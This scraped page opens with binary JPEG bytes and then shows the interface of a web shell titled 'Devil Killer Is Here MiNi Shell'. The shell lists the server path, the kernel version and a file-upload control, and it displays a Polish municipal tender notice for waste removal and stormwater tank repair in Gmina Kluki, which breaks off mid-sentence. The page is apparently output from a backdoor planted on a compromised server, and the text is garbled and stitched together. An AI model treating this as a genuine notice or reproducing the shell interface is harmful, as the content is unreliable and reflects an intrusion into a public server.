JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250204/0008808601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wydobycie, załadunek, transport i utylizacja odpadu oraz Remont zbiornika chłonno-odparowawczego dla wód opadowych w ramach zad. Bud. i rozbud. infrastruktury wodociąg. i kanaliz. na terenie Gm. Kluki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KLUKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648043</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">88</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kluki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-415</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446315035</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kluki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kluki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wydobycie, załadunek, transport i utylizacja odpadu oraz Remont zbiornika chłonno-odparowawczego dla wód opadowych w ramach zad. Bud. i rozbud. infrastruktury wodociąg. i kanaliz. na terenie Gm. Kluki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-181c0d75-ec13-482e-bf4c-3032f6e5272c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00088086</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00044502/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Wydobycie, załadunek, transport i utylizacja odpadu oraz Remont zbiornika chłonno-odparowawczego dla wód opadowych w ramach zad. Bud. i rozbud. infrastruktury wodociąg. i kanaliz. na terenie Gm. Kluki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie dofinansowane jest ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020, typ operacji „Gospodarka wodno-ściekowa”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-181c0d75-ec13-482e-bf4c-3032f6e5272c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu o udzielenie zamówienia komunikacja odbywa się między Zamawiającym a Wykonawcami przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia,zwanej Platformą,dostępnej pod<br/>adresem:https://ezamowienia.gov.pl.Korzystanie z Platformy jest<br/>bezpłatne.Wykonawca zamierzający wziąć udział w postęp. o udzielenie zamów.publicz. musi posiadać konto<br/>podmiotu&#34;Wykonawca&#34;na Platformie.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy określa Regulamin Platformy,dostępny na stronie inter.<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulaminserwisu<br/>oraz informacje zamieszczone w zakładce&#34;Centrum pomocy.&#34;Przeglądanie i pobieranie publicznej treści dok. postęp. nie<br/>wymaga posiadania konta na Platformie ani logowania.Sposób sporządzenia dok. elektr. lub dok. elektr. będących kopią<br/>elektroniczną treści zapisanej w postaci papierowej(cyfrowe odwzorowania)musi być zgodny z wymaganiami określonymi w<br/>rozporz.Prezesa Rady Ministrów z dnia30.12.2020r.w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicz. dla dok. elektr. oraz środków komunikacji elektr. w postęp. o udziel. zamów. publicz. lub konkursie(Dz.U.z<br/>2020r.,poz.2452).Dok. elektr.,o których mowa w§2ust.1 ww.Rozporz.,w tym m.in.oferty,oświadczenia,o których mowa w<br/>art.125ust.1,podmiotowe środki dowodowe,w tym oświadczenie,o którym mowa w art.117ust.4ustawyPzp oraz zobowiązanie<br/>podmiotu udostępniaj. zasoby,o którym mowa w art.118ust.3ustawyPzp,przedmiotowe środki dowodowe,pełnomocnictwo,sporządza<br/>się w postaci elektr.,w formatach danych określonych w przepisach wydanych na podst. art.18ustawy z dnia 17.02.2005r.o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne(t.j.Dz.U.z2024r.,poz.307 )tj.Rozporz.Rady Ministrów w<br/>sprawie Krajowych Ram Interoperac.,min. wymagań dla rejestrów publicz. i wymiany informacji w postaci elektr. oraz min. wymagań<br/>dla systemów teleinformat.(t.j.Dz.U.z2017r.,poz.2247),z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako<br/>załączniki.Informacje,oświadczenia lub dokumenty,inne niż wymienione w§2ust.1 rozporz.Prezesa Rady Ministrów w sprawie<br/>wymagań dla dok.elektr.,przekazywane w postępowaniu sporządza się w postaci elektr.:w formatach danych określonych w<br/>przepisach rozporz.Rady Ministrów w sprawie Krajowych Ram Interoper.(i przekazuje się jako załącznik),lub jako tekst wpisany<br/>bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektr.(np.w treści wiadomości e-mail lub w<br/>treści&#34;Formularza do komunikacji.&#34;Jeżeli dokumenty elektr.,przekazywane przy użyciu środków komunikacji elektr.,zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16.04.1993r.o zwalczaniu nieuczciwej<br/>konkurencji(t.j.Dz.U.z2022r.,poz.1233),Wykonawca,w celu utrzymania w poufności tych informacji,przekazuje je w wydzielonym i<br/>odpowiednio oznaczonym pliku,wraz z jednoczesnym zaznaczeniem w nazwie pliku&#34;Dokument stanowiący tajemnicę<br/>przedsiębiorstwa&#34;.Komunikacja w postępowaniu,z wyłączeniem składania ofert,odbywa się drogą elektr.za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce&#34;Formularze&#34;(&#34;Formularze do komunikacji&#34;).Za pośrednictwem&#34;Formularzy do<br/>komunikacji&#34;odbywa się w szczególności przekazywanie wezwań i zawiadomień,zadawanie pytań i udzielanie odp.Formularze do<br/>komunikacji umożliwiają dołączenie załącznika do przesyłanej wiadomości (&#34;dodaj załącznik&#34;).Możliwość korzystania w postępow.<br/>z&#34;Formularzy do komunikacji&#34;w pełnym zakresie wymaga posiadania konta&#34;Wykonawcy&#34;na Platformie oraz zalogowania się na<br/>Platformie.Do korzystania z&#34;Formularzy do komunikacji&#34;służących do zadawania pytań dot. treści dok. zamów.,wystarczające jest<br/>posiadanie tzw.konta uproszcz. na Platformie.Wszystkie wysłane i odebrane w postępow. przez Wykonawcę wiadomości widoczne<br/>są po zalogowaniu w podglądzie postępowania w zakładce&#34;Komunikacja&#34;.Maks. rozmiar plików wynosi 150MB(dotyczy plików<br/>przesyłanych jako załączniki do jednego formularza).Pozostałe zapisy umieszczone są w rozdz.XIISWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza,że spełnia wymogi określone w rozporz.Parlamentu<br/>Europejskiego i Rady (UE)2016/679z27.04.2016r.w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyr.95/46/WE(ogólne rozporz.o ochronie danych)(Dz.Urz.UEL119z4.05.2016r.,str.1z póź.zm.),dalej RODO,tym samym dane osob.podane przez Wykonawcę będą przetwarzane<br/>zgodnie z RODOoraz zgodnie z przepisami krajowymi.Zgodnie z art.13ust.1i2rozporz.Parlamentu Europejskiego i<br/>Rady(UE)2016/679z dnia27.04.2016r.w sprawie ochrony osób fiz.w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyr.95/46/WE(ogólne rozporz. o danych)(Dz.U.UEL119zdnia4maja2016r.,str.1z<br/>późn. zm.;zwanym dalej„RODO”)informujemy,że:1.administratorem Pani/Pana danych osobowych jest Gmina Kluki,reprezent.przez<br/>Wójta Gminy Kluki,tel.446315035,e-mail:sekretariat@kluki.pl;2.administrator wyznaczył Inspektora Danych Osobowych,z którym<br/>można się kontaktować pod adresem e-mail: iod@kluki.pl;3.Pani/Pana dane osobowe przetwarzane będą na podstawie<br/>art.6ust.1lit.cRODOw celu prowadzenia przedmiotowego postępowania o udzielenie zamówi.publicz. oraz zawarcia umowy a<br/>podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamów.publicz.<br/>spoczywających na Zamawiającym;4.odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty upoważnione zgodnie z<br/>przepisami prawa powszechnie obowiązującego,którym udostępniona zostanie dok.postępow.,w tym w szczególności w oparciu o<br/>art.18oraz art.74ustawyPzp;5.Pani/Pana dane osobowe będą przechowywane,zgodnie z art.78ust.1Pzp przez okres 4lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia,a jeżeli czas trwania umowy przekracza 4lata,okres przechowywania obejmuje<br/>cały czas trwania umowy.W przypadku zawarcia i realizacji umowy obejmuje również okres niezbędny do zabezpieczenia<br/>ewentualnych roszczeń wynikających z umowy,chyba,że przepisy szczegółowe stanowią inaczej;6.obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych<br/>ustawyPzp,w związku z art.6ust.1lit.CRODO,związanym z udziałem w postępowaniu o udzielenie zamów.publicz.;konsekwencje<br/>niepodania określonych danych wynikają z ustawyPzp;7.w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany,stosownie do art.22RODO,8.posiada Pani/Pan:a)na podstawie art.15RODOprawo<br/>dostępu do danych osobowych Pani/Pana dotyczących(w przypadku,gdy skorzystanie z tego prawa wymagałoby po stronie<br/>administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania,w szczególności podania nazwy lub daty postępowania o udzielenie zamów.publicz.lub konkursu<br/>albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamów.);b)na podstawie art.16RODOprawo do<br/>sprostowania Pani/Pana danych osobowych(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamów.publicz.ani zmianą postanowień umowy w zakresie niezgodnym z ustawąPzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);c)na podstawie art.18RODOprawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udziel. zamów. publicznego lub konkursu oraz<br/>przypadków,o których mowa w art.18ust.2RODO(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania,w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej,lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);d)prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. RODO 9.nie przysługuje Pani/Panu:a)w związku z art.17ust.3lit.b,d lub e RODO<br/>prawo do usunięcia danych osobowych;b)prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO;c)na<br/>podstawie art.21 RODO prawo sprzeciwu,wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art.6ust.1lit.c RODO;10.przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na<br/>niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora.Organem właściwym dla przedmiotowej<br/>skargi jest Urząd Ochrony Danych Osobowych, ul.Stawki 2,00-193Warszawa.Zamawiający udostępnia dane osobowe, o których<br/>mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze<br/>środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.Udostępnienie protokołu i<br/>załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych,o których mowa w art.9ust.1 RODO<br/>(tj.danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w<br/>celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej<br/>osoby), zebranych w toku postępowania o udzielenie zamówienia.Skorzystanie przez osobę,której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporz.2016/679,nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego, w zakresie niezgodnym<br/>z ustawą (art.19ust.2Pzp).W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art.18ust.1 rozporz.2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania<br/>(art.19ust.3Pzp).Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania<br/>oraz jego załączników (art. 76 Pzp).Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do<br/>wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in.<br/>obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych,<br/>których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny<br/>wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje<br/>już tymi informacjami (vide: art.13ust.4).Ponadto wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14<br/>RODO względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał, chyba że ma<br/>zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. W celu zapewnienia, że wykonawca wypełnił<br/>ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w<br/>związku z udziałem wykonawcy w postępowaniu,Zamawiający zobowiązuje wykonawcę do złożenia w postępowaniu o udzielenie<br/>zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art.13 lub<br/>art.14RODO.Wzór oświadczenia wymaganego od wykonawcy w zakresie wypełnienia przez niego obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art.14RODO został uwzględniony we wzorze formularza ofertowego (zał.nr1doSWZ).Do spraw<br/>nieuregulowanych w SWZ mają zastosowanie przepisy ustawy z 11września2019r.– Pzp(t.j.Dz.U.z2024r.poz.1320) oraz przepisy<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RPG.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Wydobycie, załadunek, transport i utylizacja odpadu z dna zbiornika;<br/>2) Remont zbiornika chłonno-odparowawczego dla wód opadowych:<br/>a) Roboty przygotowawcze:<br/>- Wywóz wozami asenizacyjnymi wody ze zbiornika do oczyszczalni ścieków wraz z zabezpieczeniem przed napełnieniem;<br/>- Odmulenie skarp i dna zbiornika wraz z wyprofilowaniem skarp i dna;<br/>b) Roboty odtworzeniowe:<br/>- Wykonanie podbudowy z kruszyw, piasku warstwy dolnej (grubość warstwy po zagęszczeniu 20 cm) – podbudowa dna<br/>zbiornika;<br/>- Wykonanie podbudowy z kruszyw, piasku warstwy górnej (grubość warstwy po zagęszczeniu 28 cm) - podbudowa na<br/>skarpach zbiornika dla ułożenia płyt wielootworowych (ażurowych);<br/>- Wykonanie warstwy odsączającej dna zbiornika (grubość warstwy po zagęszczeniu 10 cm);<br/>- Wykonanie warstwy filtracyjnej z kruszywa;<br/>- Umocnienie skarp zbiornika płytami wielootworowymi (ażurowymi);<br/>- Zasypanie żwirem otworów w płytach wielootworowych żwirem.<br/>2. Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej, stanowiącej Załącznik nr 4 do SWZ:<br/>1) Dokumentacji technicznej,<br/>2) Przedmiarze robót<br/>Przedmiot umowy należy wykonać zgodnie z warunkami zgłoszenia robót budowlanych<br/>nr AB.6743.72.2022.7.PK z dnia 27.05.2022 r. przyjętego bez sprzeciwu.<br/>Powyższe dokumenty stanowią załączniki do niniejszej SWZ. Dołączone do SWZ przedmiary robót mają charakter<br/>poglądowy i ułatwiający Wykonawcy identyfikację robót budowlanych. Dla ustalenia prawidłowej ilości i rodzaju robót na<br/>potrzeby sporządzenia oferty, Zamawiający sugeruje przeprowadzenie analizy pozostałych składników dokumentacji<br/>projektowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie oceniona jako<br/>najkorzystniejsza tzn. uzyska najwyższą liczbę punktów w łącznej ocenie ofert. Oferta w łącznej ocenie oferty może uzyskać<br/>maksymalnie 100 pkt.<br/>2.Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3.Zamawiający zastosuje zaokrąglanie wyników oceny do dwóch miejsc po przecinku. W sytuacji, gdy Zamawiający nie będzie mógł<br/>dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej ilości przyznanych punktów,<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych<br/>zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>4.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert<br/>lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie<br/>wskazanym przez Zamawiającego.<br/>5.Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>6.Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta<br/>otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez 